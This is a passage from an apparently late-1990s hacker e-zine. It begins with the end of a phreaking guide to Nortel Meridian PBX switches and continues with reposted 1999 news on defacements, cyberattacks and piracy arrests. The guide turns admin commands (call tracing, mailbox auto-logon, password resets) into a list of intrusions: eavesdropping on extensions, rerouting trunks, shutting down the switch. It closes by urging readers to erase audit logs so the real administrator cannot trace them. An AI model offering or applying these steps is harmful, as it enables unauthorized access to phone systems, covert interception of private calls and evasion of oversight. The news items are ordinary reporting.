KEY X ICF 4 ZZZZ
"Delayed" Ring on Multiple Appearance DNs
=========================================
Non-ringing (SCN) keys will ring after a certain duration. Great for areas
where many of the same DNs appear.
LD11
DNDR X
(X = 0-120 seconds of delay before SCN keys will start to ring)
Audible Reminder of Held Calls
==============================
Receive "buzz tone" every X seconds to remind user that call is on hold. Also
reminds user that Conference/Transfer was mishandled - call was never
transferred
LD15
DBRC X (X = 2-120 seconds between reminders)
LD11, CLS ARHA
Which Call "On Hold" is Mine
============================
Exclusive Hold sets held calls to "wink" at holding set, but stay "steady" at
other sets.
LD10/11
CLS XHA
Change Ring Cadence/Tone
========================
There are 4 ring styles, adjusted in the CLS of the digital set.
LD11
CLS: DRG1 -or- DGR2 -or- DRG3 -or- DRG4
Set pesky customer phones to DRG4 !
BFS - Nightmare in Shining Armor ?
==================================
BFS Keys allow the user to monitor the Call Forward and busy status of a set,
activate and deactivate Call Forward, and can be used as an Autodial key.
NOTE: Cannot perform MOV command with BFS. User can also forward sets by
accident.
LD11
Key XX BFS l s c u (target sets TN)
More Than 4 DNs Answered by One Mailbox?
========================================
Add up to 3 DNs to DN list in mailbox programming. Add 4th and all additional
DNs in "Voice Service DN" (VSID) Table and set to "EM" to the mailbox.
1 Single LineTelephone, 3 DNs, 3 Users, 3 Mailboxes? How?
=========================================================
Create one 2500 set with one of the three DNs. Create 2 Phantom TNs, each one
with a new DN and DCFW each of them to the 2500 sets DN (from above) Add the
three mailboxes
now any of the three numbers will ring the one set, but
messages will be separated!
Change An NCOS After Hours
==========================
Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to
NCOS 2 after 4:30PM and all day on weekends
<snip>
AC1 9
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 06 00 16 29
7 00 00 05 59
7 16 30 23 59
RTCL YES
NCOS 0 - 0
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 2
NCOS 4 - 2
NCOS 5 - 5
<snip>
Oops..the Console Went Into NITE...During the DAY!
==================================================
Use NITE entries that are based on "Time of Day". See Night Service in
Features Book If the console goes into NITE during the day, send them to
either a set of DNs next to the console, or a voice menu/thru-dialer
explaining that there are "technical difficulties". After hours, NITE calls
goes to where they should.
Just Two Security Tricks
========================
Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them
with LTER=YES Now when Phreakers ask for extn 9000, they get nobody. Use the
FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011,
90, etc.
Break Into Meridian Mailbox?
============================
Simply make the mailbox "Auto-logon". For remote access, add their DN to your
set. Convenient if you need to access an employees mailbox without changing
their password. Useful for modifying greetings of an absent employees or
allowing a temporary employee access to a mailbox without divulging the
regular employees password.
Tracing Phone Calls
===================
TRAC 0 XXXX (X=extension)
TRAC l s c u
TRAC l s c u DEV (Adds BARS info)
TRAT 0 X (X=Console number)
TRAD (see book, traces T1 channels)
ENTC (see book, traces TN continuously - up to 3 TNs at a time ! )
Forgot your M3000 Directory Password?
=====================================
LD32
CPWD l s c u
Another Idea
============
Use a PC to log into your PBX, then activate the "capture file". Now run a
TNB and keep it as a file rather than on paper. If your TNB file is large,
try a high power text editor, which can open even 20meg files in seconds.
Search the Internet "Text Editor" Keep copies so you can go back and see how
a set was programmed when you out it by mistake.
*/
Using the above information you could sucessfully do the following:
a) Setup your own trunk configurations that allow outgoing calls.
b) Reset lines and trunks, reconfugure lines and trunks.
c) Set an internal extension(s) to share the same multiplexed trunk as you
so you can effectivly listen in on any incomming/outgoing phone call
made on that extension.
d) Set up calls that don't exist with no trunk assignment.
e) Set any users voicemail box with auto-logon paremters temporarily.
f) Close down the entire network
g) Set every phone in the company to ring forever...
h) Re-route incomming/outgoing trunk calls to any destination.
i) Park your own incomming line as "on console" so you can answer calls made
to a pre-set extension.
j) Make yourself the company oprtator.
k) Trace phonecalls, audit logs etc.
l) Set all trunks to loopback on one another.
m) Anything you want?
Thats just a few ideas. But before you do ANYTHING, you should be aware that
anything you do could have devestating impact on the companys phone switch.
For example, say you accidently commanded the system to shut down.. You would
effectivly be killing 6000+ peoples phone lines, which would yield colosal
financial burden/loss onto the company. Generaly I'm just saying, be nice..
Just because you have the power to do such things, it doesnt mean you have to
do it. :)
A final note: In the aftermath of obtaining access to a merdian switch, it is
generaly advisable to erase all trace of you ever being on there. This can
be achived by reseting trunk audit logs, and erasing any log of your incoming
trunk setups. Therefore, if the real admin decided to track what was going on
he/she would get nowhere because the lines you used to initially call into
the system DO NOT EXIST. Its just a case of using your imagination. Don't be
destructive, Don't alter anything that would be noticed, Generally don't be
a f00l.. Thats the end of this file, I hope you enjoed it. Take it easy.
Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX.
. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .
@HWA
31.0 Adobe Fingers EBay Pirates
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest
Information from Adobe provided to federal law
enforcement officials lead to the arrest and indictement
of two people from West Virginia who have allegedly
attempted to auction off pirated copies of Adobe
products online.
Andover News
http://www.andovernews.com/cgi-bin/news_story.pl?72306/topstories
Top Stories
Adobe Systems Helps Feds Nab EBay
Software Pirates 11/03/99
SAN JOSE, CALIFORNIA, U.S.A., 1999 NOV 3 (Newsbytes) -- By Sherman
Fridman, Newsbytes. Two alleged software pirates are about to walk the
judicial plank as a result of a Federal indictment that was announced
today.
Ralph Gussie Sumlin, Jr. and Elizabeth Jean Sumlin, both of Farmington,
W.Va., were charged in one-count indictments alleging that they willfully
infringed on copyrights owned by Adobe Systems Inc. [NASDAQ:ADBE]. The
indictments said that the copyright violations occurred when the Sumlins
attempted to auction what is believed to be pirated Adobe software on
eBay's online auction site.
In an announcement made by Adobe Systems after the indictments were handed
out, Batur Oktay, corporate counsel for Adobe is reported to have said,
"Based on our investigations, we have found that the vast majority of
Adobe software sold on these sites is pirated." He also said that, "Adobe
will continue its aggressive campaign against Internet piracy."
Adobe Systems reportedly worked in close collaboration with the FBI,
Postal Inspection Service, and the Fairmont, Calif., police department in
this case.
In an ongoing effort to enforce copyright compliance, Adobe has partnered
with anti-piracy organizations such as The Business Software Alliance
(BSA) and the Software Publisher's Association (SPA) to investigate and
sue end-users and resellers of pirated software.
In addition, Adobe is encouraging consumers to report sellers of
counterfeit Adobe products, and has established the e-mail address
piracy@adobe.com for this purpose.
Reported by Newsbytes.com,
http://www.newsbytes.com
09:29 CST Reposted 10:16 CST
@HWA
32.0 India, Syria, Iran Have Offensive Cyberwar Abilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by some1
India, Syria, Iran have been labeled as the most
sophisticated countries out of twenty three who are
believed to have the capacity to engage in
state-sponsored, electronic warfare. (Unfortunately
This article does not mention where this information
comes from.)
Detroit News
http://detnews.com/1999/technology/9911/03/11030116.htm
India, Syria, Iran adept at e-raids
Lisa Hoffman / Scripps Howard News Service
WASHINGTON -- So far, as many as 23 countries are believed to have the
capacity to engage in state-sponsored, surreptitious electronic raids.
Among the most sophisticated: India, Syria and Iran, experts say. Some
nations already have taken the leap: Indonesia: Its government in January
was identified as being behind a coordinated assault on Ireland's Internet
service provider, which hosted a Web site advocating independence for the
province of East Timor. Russia: Hackers working for the Russian government
targeted Pentagon computer networks between January and May, apparently in
search of naval codes and missile guidance data. Pentagon officials say
the attacks failed to penetrate classified systems. China: It launched an
assault an array of U.S. government Web sites, including those of the
departments of Energy and Interior and the White House's public site,
which was knocked out of commission three times. These occurred after a
U.S. bomb accidentally struck the Chinese Embassy in Belgrade in May
during the conflict with Yugoslavia. The assault was triggered by outraged
Chinese government operatives, apparently letting their emotions get the
better of them. They lobbed a fusillade of electrons but, by doing so,
also revealed an astonishing 3,000 to 4,000 "back doors" into U.S.
computer systems that had been created by China, according to Jay
Valentine, head of Infoglide Corp., an Austin, Texas, company that
investigates computer security breaches for the U.S. government. Valentine
estimates that number of secret passages amounts to only about 5 percent
of those China has managed to establish in both government and private
industry systems. Even more sobering is the public discussion now going on
within China's top military leadership circles about the desirability of
developing a "dirty war" strategy, in which computer viruses would be used
against the West. Revelations such as these are adding urgency to the
Pentagon's efforts to fortify its systems against incursions and cobble
together a war-fighting doctrine to guide its own conduct of cyber combat.
Defense leaders have designated the U.S. Space Command in Colorado Springs,
Colo., as the headquarters for both offensive and defensive cyber war,
although it won't come online until next October.
@HWA
33.0 Singapore Launches Probe Into Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
A recent defacement of a government web site in
Singapore has caused the National Computer Board to
launch an investigation. Singapore officials said that
they will work closely with their foreign counterparts to
investigate and track the perpetrators.
The Straits Times
http://straitstimes.asia1.com/cyb/cyb1_1102.html
NOV 2 1999
Probe into hack at S'pore Govt website
THE National Computer Board is investigating Sunday's possible hacking
into the Singapore Government website.
Asked about the incident yesterday, Minister for Communications and
Information Yeo Cheow Tong said the incident showed the risk all countries
face.
He said that adding safeguards may prove to be a temporary solution.
"Each time you come up with some safeguards, we find that somebody else
will come up with an equally innovative way to bypass our safeguards.
"It's a continuing process we have to cope with," he said.
He was speaking to reporters after his keynote address at the trade show,
Sapphire '99 Singapore.
In Sunday's incident, the contents of the page were reportedly removed and
replaced with a message from a hacker.
This was temporary and checks showed that the site was back to normal on
Sunday itself.
The hacker is said to be a foreigner and the National Computer Board
yesterday said that the law here treated foreign hackers no different from
local ones.
It said: "Regardless of the nationalities of the alleged hackers, the
Singapore police will work closely with their foreign counterparts to
investigate and track the
perpetrators."
@HWA
34.0 Military Sites Invaded
~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
hV2k has claimed responsibility for defacing web sites
that belonged to the Navy, Marines, and other sites.
(Unfortunately this sort of thing has become so
common it is no longer news.)
News Bytes
http://www.newsbytes.com/pubNews/99/138770.html
Attrition.org - Defacement Mirror
http://www.attrition.org/mirror
News Bytes;
Four US '.mil' Web Sites Invaded By Cracker Group
By Bob Woods, Newsbytes
WASHINGTON, DC, U.S.A.,
02 Nov 1999, 1:12 PM CST
A group of hackers - more accurately known as "crackers" - hit at least
four US military Web sites sometime on Monday, according to a Web site
that tracks such infiltrations. As Web site crackings go, though, three of
the four invasions were relatively benign.
The group "hV2k" claimed responsibility for the invasions, through text
left behind at each site, according to copies or "mirrors" of the sites
stored at Attrition.org.
HV2k completely replaced the framed main page at the Navy Crane Center's
(http://ncc.navfac.navy.mil ) Web site with the message, "Hi Mr DOD Admin,
guess what.. YER SEKURITY SUCKS, oh and hV2k owns you. *kiss*"
The group's infiltration of the AEGIS Training and Readiness Center
Detachment in Norfolk, Va. (http://www.norfolk.atrc.navy.mil ) and the
Marine Corps Air Station at Iwakuni, Japan (http://www.iwakuni.usmc.mil )
were not as bold. Neither page was greatly altered, save for a line at the
bottom of each site. The note at the Marine Corps site said, "Hi kids,
SLiPY of hV2k here just bitching about NT and how bad it sucks. Greets to
NukeLear and Bleeding Angel." And "hi hV2k here" was left by the
infiltrators at the AEGIS site.
As of 1:40 PM EST today, the Iwakuni Web site was down, according to an
automatically generated prompt at the site.
HV2k's cracking of the Naval Air Warfare Center Aircraft Division (NAWCAD)
at Webster Field, Md. (http://www.webster.webfld.navy.mil ) was much more
subtle. The group inserted the message, "Hi! kiddies, no its not santa,
its me, SliPY. hV2k" as black text on an otherwise undefaced page that has
a black background. The message can be seen only if the page source is
viewed through the Web browser, or if the bottom of the page where the
text is located is highlighted.
US military forces were not alone in facing hV2k's wrath. The official Web
site of Canada's Department of National Defense and the Canadian Forces
(http://www.dnd.ca ) was also defaced by the group sometime Monday. The
group took the minimalist approach with this infiltration, simply writing
at the bottom of the site's main page, "hi slipy and hv2k own."
HV2k seems to have shifted its focus to military sites from much smaller
commercial Web pages. The group claimed responsibility for cracking sites
like "Bottle Cap Site," "America's Highway" and "Totally Dumb" in October,
and "Think Tank Online Services" and the Geofluids Engineering Lab at the
Seoul National University, according to Attrition.org's archives.
And an Attrition.org official told Newsbytes in an e-mail interview that
hV2k has been cracking sites for some time.
Attrition.org is at http://www.attrition.org .
Reported By Newsbytes.com, http://www.newsbytes.com .
13:12 CST
Reposted 13:53 CST
@HWA
35.0 Emergency FidNet Funding Canceled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evilwench
After the the House Appropriations Committee eliminated
funding for the proposed Federal Intrusion Detection
surveillance system (FIDNet), the White House found
other funding through a $611 million mid-year fiscal 2000
budget amendment. Now less than one week before the
Clinton Administration's proposed network security plan
is slated to be unveiled, Congress has refused the
request to provide the $39 million to fund the project.
The proposed FIDNet system will be run by the General
Services Administration who hopes that supplemental
funding for FIDNet will be found by January but will go
ahead with the plan regardless if specific money is
allocated.
Government Executive Magazine
http://www.govexec.com/dailyfed/1199/110399b3.htm
November 3, 1999
DAILY BRIEFING
Congress refuses to fund
security network
By Drew Clark, National Journal's Technology Daily
Less than one week before the Clinton Administration's
proposed network security plan is slated to be unveiled and
discussed, Congress has ref
used a last-minute request to
provide $39 million in fundsincluding $8.4 million for the
controversial Federal Intrusion Detection Network
(FIDNet)until at least January.
Although House Majority Leader Richard Armey, R-Texas,
has raised a number of questions about the privacy implications
of FIDNet, the principal objection seems to be money. And
with the House unwilling to dip into other sources to
accommodate the administration's computer security proposal,
the lack of funding could further delay the full-scale rollout of
critical infrastructure plans.
"The request came as an amendment to the Treasury-Postal
appropriations bill after it had been signed into law," said John
Scofield, a spokesman for House Appropriations Committee
Chairman C.W. "Bill" Young, R-FL. "We didn't have time to
give it consideration and will look at it next year."
The administration had proposed funding the programs by
using the counter-terrorism fund of the Department of Justice,
Scofield said. But he said a Department of Justice program
"shouldn't be used as a funding mechanism for something that is
administration wide."
Besides money for FIDNet, the request included $17 million
for a program to train and recruit students in cyber-security; $2
million for the Department of Commerce's Bureau of Export
Administration to support Information Sharing and Assessment
Centers (ISACs), a public-private partnership to protect
critical infrastructure; $5 million for computer security projects
to be run by the National Institute of Standards and
Technology; and $7 million for the Department of Treasury to
help federal agencies establish public key infrastructures to
conduct electronic transactions.
Officials at the General Services Administration said they were
prepared to continue bare-bones funding for FIDNet out of
operating revenuesomething they have done for the related
Federal Computer Incident Response Capability (FedCIRC),
a program the agency inherited from the Department of
Commerce's National Institute of Standards and Technology
last year. The agency hopes to that supplemental funding for
FIDNet will be found by January.
Without funding, "we can go ahead with the minimum activity
as we have for the last several months," said Sallie McDonald,
deputy assistant commissioner at GSA's office of information
security.
The administration's critical infrastructure plan is expected to be
unveiled at a conference next Tuesday. But a pre-release
summit involving officials from industry, government, and
privacy advocates is planned for Thursday at the State
Department, said a panelist for the event.
@HWA
36.0 Cyberattacks Against DOD up 300 Percent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Lt. Gen. David Kelley, the director of the Defense
Information Systems Agency, has said that the number
of cyber attacks reported this year against the Defense
Department's information networks has more than tripled
compared with last year. The number of cyber attacks
or unauthorized intrusions into DOD networks and
systems went from 5,844 in 1998 to 18,433 so far
during 1999.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/1101/web-attack-11-03-99.html
NOVEMBER 3, 1999 . . . 18:21 EST
Cyberattacks against DOD up 300 percent this
year
BY DANIEL VERTON (dan_verton@fcw.com)
Atlantic City -- The number of cyberattacks reported this year against the
Defense Department's information networks has more than tripled compared
with last year, according to the director of the Defense Information Systems
Agency.
The number of reported cyberattacks or unauthorized intrusions into DOD
networks and systems skyrocketed from 5,844 in 1998 to 18,433 so far
during 1999, according to Lt. Gen. David Kelley, director of DISA and
manager of the National Communications System. Because not all attacks and
intrusions are detected or reported by local system administrators and security
officials, that number could be significantly higher.
Speaking on Nov. 1 at the MILCOM 1999 conference, a three-day
symposium focusing in military communications issues in the 21st century,
Kelley said a look at the past five years indicates that cybersecurity and
cyberwarfare is a "growth industry." According to Kelley, DOD organizations
in 1994 reported only 225 attacks or unauthorized network intrusions --
roughly 1 percent of the number reported so far in 1999.
"We need smarter systems that can help heal themselves," Kelley said,
outlining his ideas for a departmentwide information assurance program.
"Hope is not a strategy," he said. "With 100 percent certainty, this nation will
face an information attack...[and] a serious one. We've got to get prepared."
A sustained and coordinated intrusion into DOD networks that took place
between January and March remains under investigation by the FBI [FCW,
March 8]. The high-profile incident has led investigators to believe the hackers
launched their attack using systems residing in Russia. However, no evidence
has been released that indicates the Russian government in the attack.
@HWA
37.0 White House Says US Vulnerable to Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by de4th
Richard Clarke, a National Security Council advisor, has
warned against the loss of electricity, transportation, or
telecommunications due to information warfare. He said
that many people where still in denial and that it was
time to wake up to reality.
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500053548-500087899-500306408-0,00.html
U.S. vulnerable to cyber attacks, White House official says
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By EUN-KYUNG KIM
WASHINGTON (November 4, 1999 9:50 p.m. EST http://www.nandotimes.com) -
Reliance on the Internet has made the nation vulnerable to attacks by
terrorists who strike through computers rather than with bombs or bullets,
a White House security adviser said Thursday.
"We could wake one morning and find a city, or a sector of the country, or
the whole country have an electric power problem, a transportation problem
or a telecommunication problem because there was a surprise attack using
information warfare," said Richard Clarke, the National Security Council
adviser who heads counterterrorism efforts.
Clarke, speaking at a cyberthreat summit, said most Americans fail to
realize how dependent they have become on computers - not only at home or
at the office, but also to run their electricity, telephone,
transportation and other infrastructure systems. Clarke compared the
reliance to former drug addicts enrolled in a recovery program.
"We need to take a lesson from that - at least they know they have a
dependency problem. Many of you are still in denial," he told his audience
during his keynote address. "Many people in the United States are still in
denial."
The summit, intended to raise awareness about computer security awareness,
follows a string of electronic attacks launched against federal government
Web sites, including those run by the White House, the Senate, the FBI and
the U.S. Army's main Internet site.
Last month, the head of the FBI's National Infrastructure Protection
Center testified before Congress about the agency's struggle to keep up
its battle against threats posed by computer-savvy terrorists and hackers
trying to break into the government's most sensitive data networks.
And, the General Accounting Office, the investigative arm of Congress,
released a report warning that computer systems at the Defense Department,
law enforcement and private industries are at risk because of poor
management and lax oversight.
Clarke said the nation's frenzy over the Y2K computer bug has made it even
more vulnerable to cyber attacks. He said technicians hired to make a
company's computer system Y2K compliant could easily slip "a little Trojan
horse or malicious code" into the system instead.
Clarke's warning echoed one issued by Sen. Robert Bennett, R-Utah, during
a recent speech at the National Press Club. Bennett, chairman of the
Senate's Year 2000 Committee, said he wouldn't be surprised to see his
panel continue work next year on problems uncovered by the Y2K bug -
mainly security and reliability.
"We expect that (terrorists) will attempt to use Y2K as a cover for
putting some kind of attack into a vulnerable place," Bennett said. "That
is, when a Y2K solution goes in, they will fly underneath that with an
attack of their own that will shut the system down and then you
won't know whether the system shutdown was because of a terrorists attack
or because of a Y2K accident."
Clarke said the government has taken numerous steps to counter potential
cyber attacks, including stepping up intelligence efforts, improving
systems to detect intrusions and working with the private industries to
come up with solutions.
@HWA
38.0 Russia Withholding Information on Computer Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
U.S. Government computer experts have traced the
code named Moonlight Maze attack to Internet service
providers linked to Russia's Academy of Sciences, a
government-funded group involved in research projects
with military and civilian applications. Russian officials
however aren't coming clean with information regarding
these attacks leaving some investigators to wonder why?
Reuters - Via Excite
http://news.excite.com/news/r/991104/15/net-russia-usa
Moscow Said To Withhold Full Help On Cyber-Blitz
Updated 3:42 PM ET November 4, 1999
By Jim Wolf
WASHINGTON (Reuters) - Russian authorities have withheld full cooperation
in a multinational probe of computer heists from sensitive Defense
Department and other U.S. networks, a top National Security Agency
official said.
"They haven't been fully forthcoming about what's happened on the Net,"
John Nagengast, assistant deputy director for information systems
security, said late Wednesday.
U.S. authorities are not yet sure whether electronic back doors may have
been secretly crafted as part of the intrusions dubbed Moonlight Maze, he
said in an interview with Reuters.
"Did they leave behind a port for future access?" Nagengast asked
rhetorically. "There's no conclusion you can draw and say 'It's finished.
It's over'."
Nagengast spoke after outlining cyber threats to the Overseas Security
Advisory Council, a State Department-led group that feeds security-related
information to more than 1,700 U.S. companies with overseas interests.
U.S. government computer experts have traced the Moonlight Maze blitz to
Internet service providers linked to Russia's Academy of Sciences, a
government-funded group involved in research projects with military and
civilian applications.
"About the furthest I can go is to say the intrusions appear to originate
in Russia," Michael Vatis, the top U.S. "cyber cop" told Congress last
month in the first public rundown on the investigation by an executive
branch official.
Vatis, who heads the FBI-led National Infrastructure Protection Center,
said intruders had stolen "unclassified but still-sensitive information
about essentially defense technical research matters."
Nagengast said Vatis had gone to Russia to pursue the case but had come
back without having been able to obtain all the records he would have
liked to help trace the culprits.
"Some of the feedback we've gotten is 'we just don't have good audit logs
-- so we don't know where these things could have come from'," Nagengast
said, paraphrasing the Russian response.
A spokeswoman for Vatis declined comment.
Nagengast said it was premature to conclude that the cyber blitz, first
detected in March 1998, was carried out by anyone in Russia just because
it was routed through a given Internet service provider.
"Was this a kiddie training exercise" by the Russian Academy of Sciences?,
Nagengast said rhetorically. "Nobody knows at this point in time," he
said. He added that the decline of known Moonlight Maze attacks could
mean the intruders were "getting smarter and harder to see" or that they
had "lost interest."
Michael Peters, the National Security Agency's technical director for
operations, readiness and assessments, told the meeting on cyber threats
that a multinational "hacking" group called the "Enforcers" might be
involved in the intrusions.
He said the Enforcers counted members from the United States, Israel,
Australia, Brazil and Russia. The group first made itself known when the
U.S. government began to prosecute two youths from California for a series
of February, 1998, cyber break-ins to Defense Department systems.
Nagengast said some of the Moonlight Maze "hacks" had come through
computer "hosts" in Britain. "And of course, they (the British) are fully
cooperative with us."
The National Security Agency is the Pentagon arm responsible for the
computer security of U.S. national security organizations. The most costly
and secretive intelligence agency, it eavesdrops on global communications
and provides a steady stream of intercepted electronic data on topics of
interest to the U.S. government.
Vatis's organization -- the infrastructure protection center at the FBI --
leads the U.S. effort to prevent, detect and prosecute cyber crime.
Sen. Robert Bennett, who has received classified briefings on "information
warfare" as chairman of the special committee on the Year 2000 problem,
told Reuters in an interview last month the intruders had vacuumed up
vast amounts of publicly available data.
Susan Hansen, a Pentagon spokeswoman, said Thursday that the Defense
Department knew of no classified information that had been jeopardized in
the Moonlight Maze intrusions.
@HWA
39.0 Who is Richard Smith?
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
Richard Smith identified the author of the Melissa virus,
uncovered Microsoft's suspicious registration practices,
he discovered the presence of unique identifying
numbers in digital documents and this week, he revealed
RealNetworks' sneaky data-gathering practices. (While
we like and applaud what Mr. Smith has done we're not
sure he rates the label of "living, national treasure".)
Wired
http://www.wired.com/news/technology/0,1282,32252,00.html
The Internet's 'Living Treasure'
by Leander Kahney
2:15 p.m. 2.Nov.1999 PST
Whenever you read about an egregious invasion of consumer privacy on the
Internet, one name keeps popping up: Richard Smith.
Smith fingered the author of the Melissa virus. He uncovered Microsoft's
suspicious registration practices, and he discovered the presence of
unique identifying numbers in the majority of digital documents. This
week, he revealed RealNetworks' sneaky data-gathering practices.
Smith has been at the center of half-a-dozen of the biggest technology
stories this summer -- stories reported around the globe.
And he does it for love, not money.
"The man's a living, national treasure for the Internet age," said privacy
advocate Jason Catlett, founder of Junkbusters. "He's doing wonderful
things. Richard's not a privacy zealot. He wants to find the consequences
of things.
"He's independent of money and he's independent of politics," Catlett
said. "He's very good at thinking through intrusive data gathering. If
there were a dozen people like him, the Internet would be a very different
place."
A 45-year-old veteran programmer, Smith retired a couple of months ago
from Phar Lap, the software company he helped build and still owns but no
longer runs.
He started looking at Internet security issues as a hobby about three
years ago, uncovering bugs and security holes in email clients and
browsers.
A year ago he turned his attention to privacy on the Internet.
"We are moving our lives more and more onto the Internet and it's very
good at watching what we do," Smith said from his home in Brookline,
Massachusetts, where he lives with his wife. "It's like a VCR recording
your whole life. It can easily be rewound."
Smith said he's worried that the lack of Internet privacy is a tremendous
boon for the direct marketing industry and that personal data will come
back to haunt consumers in legal proceedings.
For example, Smith noted that Newt Gingrich's divorce lawyers are trying
to keep purportedly sensitive emails out of the hands of his wife's
lawyers. In a separate instance, a court ruled this week that telephone
companies could sell customers' telephone logs to direct marketers,
who can mine the data to determine individual consumer preferences.
"We're going to get more and more junk mail," he said. "The noise level is
going to go up and up. Maybe we'll get used to it, but I doubt it."
Smith tapped into the issue of RealNetwork's underhanded data gathering
practices while looking for material for a speech. He wanted something
fresh to talk about and remembered an inconclusive report he'd read in an
April edition of the Seattle Weekly about RealNetworks using secret
serial numbers. He downloaded RealJukebox and loaded up a piece of
software, called a packet sniffer, that decodes the stream of information
his computer sent out over the Internet.
The first thing he noticed was that every time he used it to play a CD,
the software sent the CD's title and playlist to RealNetworks. He also
noticed that it encrypted some information, so he enlisted a friend in
Australia to break the code and unlock the data. It turned out to be
a GUID, or unique identifying number, that can be used to identify who is
using the software as effectively as a Social Security number.
Smith said the whole thing took about half an hour, and that most of the
time was spent figuring out how to use the RealJukebox software.
He's started looking at other user-monitoring systems. For example, he
said he's discovered that some junk email, when read, secretly sends out
information about the user. Through banner ads, many high-profile Web
sites are sending confidential user registration information to
direct marketers without even knowing it.
Smith looks mainly at popular software "so when it hits the press people
say 'that affects me. I use that product.'"
He does it for fun and out of curiosity, he said, though he's starting to
"pre-consult" for some of the companies he's investigating, opening up the
possibility of turning his hobby into a commercial enterprise.
Smith's life hasn't changed much in light of all the publicity he's
generated.
"I talk to a lot of people I hadn't known before," he said. "I have a
different crowd of people I go around with now."
When he discovers a dodgy practice, Smith said the first thing he does is
inform the company before writing it up for his Web site.
Sometimes he tells the press before the company. At least, that's what
Richard Purcell, the man in charge of Microsoft's data gathering policies,
says.
"It would be nice to answer an inquiry before doing it in a public forum,"
Purcell said. "This is what we call fairness."
Although he may have caused Microsoft some embarrassing public relations
headaches, Purcell said he bears no malice toward Smith. In fact, Purcell
invited him up to Redmond afterwards to meet a number of the company's
product people and flesh out some outstanding privacy issues.
"He's a very talented technologist," Purcell said. "I like him."
@HWA
40.0 Federal Guidelines for Searching and Seizing Computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by newbie
Worried about being busted? Scared that the feds may
come and take all of your computers? Is that Thermite
bomb really necessary? This may be of interest, the
Federal Guidelines for Searching and Seizing Computers.
Department of Justice
http://www.usdoj.gov/criminal/cybercrime/searching.html#FED_GUID
@HWA
41.0 Canadian Defense Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The Department of National Defense Web site was
defaced last Monday night. The National Investigative
Service is attempting to locate the perpetrators.
Officials said that no sensitive information was
accessed.
Globe Technology
http://www.globetechnology.com/archive/gam/News/19991103/UDEFEM.html
National Defence Internet site falls prey to attack by hacker
No sensitive information revealed
despite security breach, DND says
TYLER HAMILTON
Technology Reporter
Wednesday, November 3, 1999
Toronto -- Computer hackers broke into the Department of National Defence
Web site on Monday night, the latest in a recent series of security
breaches on federal, provincial and municipal Web sites in Canada.
DND spokesman Captain André Berdais said the attack was the first major
hacking incident on the department's Web site, and that the National
Investigative Service is trying to track down who breached the site -- and
how they did it.
"We're dealing with this as if it's an act of vandalism," Capt. Berdais
said.
He said the breach occurred at about 6 p.m. Monday evening, and that an
incident-response team discovered the breach and shut down the site at
about 8 p.m.
"There was no sensitive information [accessed]," he said. "What was
breached was our Web site that passes information to the public. None of
the other internal computer systems have been hit."
This isn't the first time the DND's Web security policies have been the
subject of controversy. In September, it was discovered that the resumés
of at least five former and current eavesdroppers had been posted on its
site, including detailed information about the classified equipment they
used and the restricted areas they had access to.
Monday's breach, however, represents the first time a hacker was able to
access and manipulate the department's Web site.
Similar attacks have occurred recently on provincial and municipal
government Web sites. The City of Mississauga and Peel Board of Education
sites were hacked last week, and in August the Web site of Ontario's
Ministry of Northern Development and Mines was breached and various
network passwords were stolen.
In the latter case, the culprit littered the site with South Park cartoon
graffiti and warned the government of its security flaw -- no major
information was taken or damage done.
Still, such breaches illustrate how easy it is for hackers to meddle with
computer systems -- even those belonging to the federal department in
charge of the nation's security -- and how seemingly harmless acts of
vandalism can escalate into calculated terrorism.
The Canadian Security Intelligence Service issued a report in August
warning that cyberterrorism and Internet vandalism are becoming a major
concern for societies that depend on computer-based communications.
Dave Cosgrave, an Internet expert with the Alliance for Converging
Technologies in Toronto, said governments around the world are at the
stage of weighing the efficiencies and cost savings associated with the
Internet with the potential risks of going on-line.
"Certainly, the more you open up government services and information to
on-line avenues, [the more] you expose yourself to risk," he said. "But I
don't think there's a compelling argument in telling governments to sit
back and wait."
Canada has been moving aggressively to bring more public services to the
Internet.
For example, Canada Post Corp. recently launched an electronic post office
to carry the nation's bills, documents and letters in digital form over
the Internet. A successful breach of that site might conceivably give a
hacker instant access to the nation's mail system.
"I'm not going to say it doesn't bother us, but it's part of business when
you have business on the Internet," Capt. Berdais said. "Like everything
else in the military, there's lessons learned from any type of incident .
. . because it's the Internet, it's not unexpected. And we do have
measures to deal with it."
@HWA
42.0 Defacement of South Africa Statistics Site Investigated
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Alien Plague
An investigation into the latest attack on South Africa's
Statistics web site has revealed that the assault
